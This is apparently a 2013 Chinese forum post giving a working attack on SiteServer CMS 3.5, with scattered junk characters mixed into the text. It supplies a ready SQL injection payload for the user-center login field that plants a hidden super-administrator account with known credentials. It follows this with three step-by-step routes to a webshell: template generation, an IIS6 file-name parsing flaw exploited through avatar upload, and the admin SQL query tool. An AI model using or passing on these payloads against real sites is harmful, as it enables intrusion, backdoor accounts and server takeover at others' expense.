经测试秒杀最新的3.5版
. U( ?) a h7 @3 K+ Q, D7 Tstieserver官网:www.siteserver.cn
; x0 R8 ^% R" j& a# J8 ?8 G$ sEXP:5 ` b8 z# l$ n; i2 f3 V
直接访问UserCenter/login.aspx
- L. q) h1 W* c7 ]. u用户名处输入:: |8 }3 f' y) x, o/ a3 I! T+ h
, A5 @* G4 i7 T) M/ R+ E4 L
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
" G2 _2 Y0 G2 u M密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。7 ~% x0 c d9 {( W( V9 n' D2 o
之后再访问后台SiteServer/login.aspx用插入的用户登陆) b& Z0 g0 S& n+ s
后台拿webshell的三种方法:
) t! u6 s( \6 \! W一、
5 f, O1 w4 t& l' X: C站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx% P5 i6 J% V% Q/ U4 M
二、% X2 S9 J3 g0 `( t
成员权限-》添加用户-》用户名为:1.asp
% e- r3 ?4 ^% g, L$ w" shttp://127.0.0.1/usercenter/
1 P L" F4 O& W用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
1 q, N" r3 V/ p6 ^(ps:后台添加用户时不会验证是否含有非法字符)& I/ w( M) C( P) j$ O( G
三、
# [, N# l1 W: r) [系统工具-》实用工具-》机器参数查看# ]3 Y& l2 A# N% z
可以看到数据库类型、名称,WEB路径' w8 _, D9 B1 H/ N5 Y# [2 I
系统工具-》数据库工具-》SQL语句查询+ \7 U$ N8 A5 q4 b" q5 o0 D
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |
发表于 2013-2-16 21:40:46
收藏
分享
支持
反对